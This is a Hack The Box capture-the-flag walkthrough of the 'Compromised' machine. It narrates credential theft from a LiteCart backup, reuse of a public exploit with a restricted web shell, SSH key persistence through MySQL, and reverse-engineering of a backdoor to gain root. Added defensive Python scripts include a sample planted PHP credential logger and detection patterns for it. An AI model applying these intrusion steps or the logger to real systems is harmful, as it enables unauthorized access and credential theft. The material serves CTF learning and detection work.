Introduction

Compromised from HTB is an incident-response style box in which a Linux environment and an eCommerce solution, LiteCart, have been exploited. Using some investigation, the ability to read both PHP and Python code, and a bit of luck, I was able to root this box. I begin every scan using AutoRecon:

Website showing LiteCart is running.

After finishing the scans I noticed port 80 was open. Visiting the website, I could see the eCommerce solution LiteCart running. Looking through the AutoRecon results I could also see that a /backup/ folder existed. If you are not using AutoRecon, I would always recommend running Dirbuster and Nikto against any web server:


The Backup Folder

The backup folder had a single file, a.tar.gz, inside. I downloaded the file and extracted it. Inside I found a full backup of the LiteCart website. The first thing I tend to check is the file modification dates.


Looking through the files I noticed that this website had previously been compromised, so this is more of an incident-style box. I first grab the database credentials, as the website states it is using MySQL alongside PHP. Next, looking through the files, I notice comments. What is odd is that you would expect these particular comments to be un-commented or removed. I also notice from one of the comments that when a username and password are submitted they are sent to a log file. Why would someone want that to happen?
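As an added example (not code from the post, and not part of LiteCart), the following Python script performs the two triage steps described above over an extracted backup: it lists files newest-first by modification time, and it flags any PHP statement that both calls a write/send primitive and references a submitted username or password, which is the planted credential logger this section describes. The temp-directory sample tree, the regexes, the file names and the /tmp/.log path are all constructed for the example; point files_by_mtime and find_credential_logging at the real extracted directory instead.

```python
import os
import re
import tempfile
import time
from pathlib import Path

# Heuristic for a planted credential logger: one statement that both calls a
# write/send primitive and references a password- or username-bearing request
# variable. Both patterns are assumptions for this example, not signatures
# taken from the post.
WRITE_CALLS = re.compile(r"\b(file_put_contents|fwrite|fputs|error_log|mail)\s*\(", re.I)
CRED_VARS = re.compile(
    r"\$_(POST|REQUEST|GET)\s*\[\s*['\"](password|passwd|pass|username|email)['\"]", re.I)


def files_by_mtime(root):
    """Every regular file under root as (mtime, relative path), newest first."""
    root = Path(root)
    entries = [(p.stat().st_mtime, p.relative_to(root).as_posix())
               for p in root.rglob("*") if p.is_file()]
    return sorted(entries, reverse=True)


def find_credential_logging(root):
    """(relative path, line, statement) for PHP statements that write submitted credentials.

    Splitting on ';' means a call that spans several source lines is still seen
    as one statement; the reported line is the one holding the write call.
    """
    root = Path(root)
    findings = []
    for p in sorted(root.rglob("*.php")):
        text = p.read_text(errors="replace")
        pos = 0
        for stmt in text.split(";"):
            call = WRITE_CALLS.search(stmt)
            if call and CRED_VARS.search(stmt):
                lineno = text.count("\n", 0, pos + call.start()) + 1
                findings.append((p.relative_to(root).as_posix(), lineno, " ".join(stmt.split())))
            pos += len(stmt) + 1
    return findings


def build_sample_backup():
    """Constructed stand-in for the extracted backup (not the box's real files)."""
    root = Path(tempfile.mkdtemp(prefix="backup_"))
    (root / "includes").mkdir()
    (root / "admin").mkdir()
    clean = "<?php\n$db = mysqli_connect('localhost', $db_user, $db_pass);\n"
    tainted = (
        "<?php\n"
        "if (isset($_POST['login'])) {\n"
        "  // planted: copy the submitted credentials to a file\n"
        "  file_put_contents('/tmp/.log', $_POST['username'] . ':' .\n"
        "      $_POST['password'] . \"\\n\", FILE_APPEND);\n"
        "  $user->login($_POST['username'], $_POST['password']);\n"
        "}\n"
    )
    # (content, age in days): the tampered file is far newer than the install
    files = {
        "includes/config.inc.php": (clean, 90),
        "index.php": (clean, 90),
        "admin/login.php": (tainted, 2),
    }
    now = time.time()
    for rel, (content, age_days) in files.items():
        path = root / rel
        path.write_text(content)
        stamp = now - age_days * 86400
        os.utime(path, (stamp, stamp))
    return root


if __name__ == "__main__":
    backup = build_sample_backup()
    for mtime, rel in files_by_mtime(backup):
        print(time.strftime("%Y-%m-%d", time.localtime(mtime)), rel)
    for rel, line, stmt in find_credential_logging(backup):
        print(f"{rel}:{line}: {stmt}")
```

Sorting by mtime first is deliberate: on a real backup the handful of files newer than the rest of the install are usually the ones worth reading by hand, and the regex pass is only there to point at the statement inside them.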

After navigating to the log file I was able to get the credentials for the admin user. I logged in to LiteCart via /admin/ and saw that it was running LiteCart 2.1.2. I Googled "LiteCart 2.1.2 exploit" and found an exploit on Exploit-DB.

HTB Forums Hints!

Running the script and navigating to the directory comes up with a blank page. A hint from sparkla on the HTB forums gave me my next foothold. I changed the exploit script to include phpinfo();.


This gave me an extremely ugly output in my console, but navigating to the URL gave a clean output of phpinfo(). Removing the print r.content line from the script will stop the console output. Viewing phpinfo() shows that a lot of functions have been disabled, restricting a traditional shell.

disabled_functions within phpinfo()

The Restricted Shell

A number of options are available to bypass disable_functions restrictions within PHP. For this I went over to an infamous repo, carlospolop's, in search of his phpwebshelllimited. For those who are unaware, he is also the creator of PEASS, one of the best privilege-escalation script suites available.
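The reason bypasses exist is that disable_functions is only as good as its coverage, so the defender's counterpart to the two paragraphs above is to check exactly which OS-reaching functions a given setting still leaves callable. The Python check below is an added example (not from the post, LiteCart or the PHP documentation): it pulls the local disable_functions value out of plain-text phpinfo() output and diffs it against a hardening baseline. SAMPLE_PHPINFO and the OS_EXEC_FUNCTIONS baseline are assumptions constructed for the example, not the box's real output.

```python
import re

# Functions through which PHP code reaches the operating system. This baseline
# is an assumption for the example (drawn from common PHP hardening practice),
# not a list taken from the post or from LiteCart. putenv and mail are included
# because hardening guides disable them alongside the exec family: together they
# let a script influence the environment of a helper process that PHP spawns.
OS_EXEC_FUNCTIONS = {
    "exec", "passthru", "shell_exec", "system", "proc_open", "popen",
    "pcntl_exec", "dl", "putenv", "mail",
}

# Constructed phpinfo() text for this example, in the plain "local => master"
# form. The box's real phpinfo() output is not reproduced here.
SAMPLE_PHPINFO = """\
Directive => Local Value => Master Value
allow_url_fopen => On => On
disable_functions => pcntl_alarm, pcntl_fork,exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec => pcntl_alarm, pcntl_fork,exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec
display_errors => Off => Off
"""


def parse_disable_functions(value):
    """Comma-separated list as PHP reads it: surrounding whitespace ignored, case-insensitive."""
    if value.strip().lower() == "no value":
        return set()
    return {f.strip().lower() for f in value.split(",") if f.strip()}


def phpinfo_disable_functions(phpinfo_text):
    """Return the local disable_functions value from plain-text phpinfo() output ('' if absent)."""
    m = re.search(r"^disable_functions => (.*?) => ", phpinfo_text, re.M)
    return m.group(1) if m else ""


def uncovered_exec_functions(value):
    """OS-reaching functions that remain callable under the given disable_functions value."""
    return sorted(OS_EXEC_FUNCTIONS - parse_disable_functions(value))


if __name__ == "__main__":
    value = phpinfo_disable_functions(SAMPLE_PHPINFO)
    print("disabled:", sorted(parse_disable_functions(value)))
    print("still callable:", uncovered_exec_functions(value))
```

An empty remainder from uncovered_exec_functions is the state to aim for; anything left in the list is a function the web application can still call, and the fix is to add it to disable_functions in php.ini rather than to rely on the application never reaching it.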

I saved the file as disabledfunctions.php and proceeded to alter 45267.py to import the file.


I also changed the request/print areas to make sure the response completed (and OCD…).


Navigating to the displayed URL, you should be presented with a shell (a bad one, but still a shell) from which to continue lateral movement.

The shell in all its glory.

MySQL

Running the command cat /etc/passwd will show you that MySQL has a profile. We also already have (from good enumeration earlier) the MySQL password from the backup file. This next step took me a while, but I recommend reading through this. Running the command below, I could see that exec_cmd was available, which would allow me to run commands as MySQL.

exec_cmd function available.

Next I created an SSH key on my Parrot machine. I did this because of a comment in the HTB forums by Sys7em.

“key” “gen”erally you say…

Using the hint alongside the article here, I was able to create the key and deploy it to the box.
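The key deployed above is persistence in a service account's home directory, which is exactly what a responder on a box like this should audit for. The Python script below is an added example (not from the post): it reads /etc/passwd-style text, treats accounts with a uid below 1000 or a nologin shell as service accounts, and reports any whose home holds a non-empty authorized_keys. SAMPLE_PASSWD, the temp filesystem tree it builds, the uid threshold and the placeholder key strings are constructed for the example; pass the real passwd contents and a mounted image root (or "/") to run it against a system.

```python
import tempfile
from pathlib import Path

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}
UID_MIN = 1000  # first regular-user uid on Debian-style systems (an assumption for this example)

# Constructed /etc/passwd excerpt; the box's real file is not reproduced here.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:112:118:MySQL Server,,,:/var/lib/mysql:/bin/bash
sysadmin:x:1000:1000:sysadmin,,,:/home/sysadmin:/bin/bash
"""


def parse_passwd(text):
    """Yield (name, uid, home, shell) from /etc/passwd-style text, skipping malformed lines."""
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != 7 or not parts[2].isdigit():
            continue
        yield parts[0], int(parts[2]), parts[5], parts[6]


def is_service_account(uid, shell):
    """System accounts either sit below UID_MIN or carry a shell that refuses logins."""
    return uid < UID_MIN or shell in NOLOGIN_SHELLS


def service_accounts_with_ssh_keys(passwd_text, fs_root="/"):
    """(account, authorized_keys path, key count) for service accounts reachable over SSH.

    fs_root lets the check run over a mounted image or a copied tree instead of the live /.
    Blank lines and comment lines in authorized_keys are not counted as keys.
    """
    root = Path(fs_root)
    hits = []
    for name, uid, home, shell in parse_passwd(passwd_text):
        if not is_service_account(uid, shell):
            continue
        ak = root / home.lstrip("/") / ".ssh" / "authorized_keys"
        if not ak.is_file():
            continue
        keys = [l for l in ak.read_text().splitlines()
                if l.strip() and not l.lstrip().startswith("#")]
        if keys:
            hits.append((name, ak.as_posix(), len(keys)))
    return hits


def build_sample_root():
    """Constructed filesystem tree matching SAMPLE_PASSWD (not the box's real files)."""
    root = Path(tempfile.mkdtemp(prefix="fsroot_"))
    # root: a comment-only file, so it must not be reported
    (root / "root/.ssh").mkdir(parents=True)
    (root / "root/.ssh/authorized_keys").write_text("# no keys deployed\n")
    # mysql: one deployed key, the persistence path this section describes
    (root / "var/lib/mysql/.ssh").mkdir(parents=True)
    (root / "var/lib/mysql/.ssh/authorized_keys").write_text(
        "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERKEYDATAFORTHISEXAMPLE0000000 unknown@host\n")
    # sysadmin: a regular user, so a key there is expected and not reported
    (root / "home/sysadmin/.ssh").mkdir(parents=True)
    (root / "home/sysadmin/.ssh/authorized_keys").write_text(
        "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERKEYDATAFORTHISEXAMPLE1111111 sysadmin@laptop\n")
    return root


if __name__ == "__main__":
    for name, path, count in service_accounts_with_ssh_keys(SAMPLE_PASSWD, build_sample_root()):
        print(f"{name}: {count} key(s) in {path}")
```

Note that the mysql entry in the sample keeps /bin/bash as its shell, mirroring the fact that the author could SSH in as that user: a nologin shell alone would have blocked this path, which is why the uid threshold and the shell are checked independently.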

Logged into the box as mysql@compromised

Escalation/Ghidra

Using the /etc/passwd data from earlier, as well as navigating to the home directory, shows me I am looking for the sysadmin user next. I tried to download linPEAS to the machine before I realised I couldn't make an outbound connection. The next steps were manual search methods.

Why is that password so much stronger?

Immediately I noticed that a password I had been using had been changed, on a line of data that came up. I tried the password and successfully logged in as sysadmin. After logging in as sysadmin I began searching for priv-esc. I was stumped for a while on this part and don't want to give too much away. The one thing I can say is that, as this is an 'incident response' style box, you should look for how the person before you has been doing .things. How have they .named files? How have they covered their tracks?

After finding the needed file I copied it to my local machine with scp.


This part took me an extremely long time, as I had never done any kind of binary file investigation before. People on the HTB forum pointed me to Ghidra. This requires a JDK, which you can get here. Once installed, I copied the file from my Parrot OS over to my Windows machine. With the assistance of a friend and a PM on the HTB forum, I was able to find a backdoor function.

Backdoor function. I hated my life at this point.

If you trace this function and convert both backdoor strings, you will have the password for root.

HTB Compromised rooted

Rooted

Published On: January 23rd, 2021 / Categories: HTB, Technology
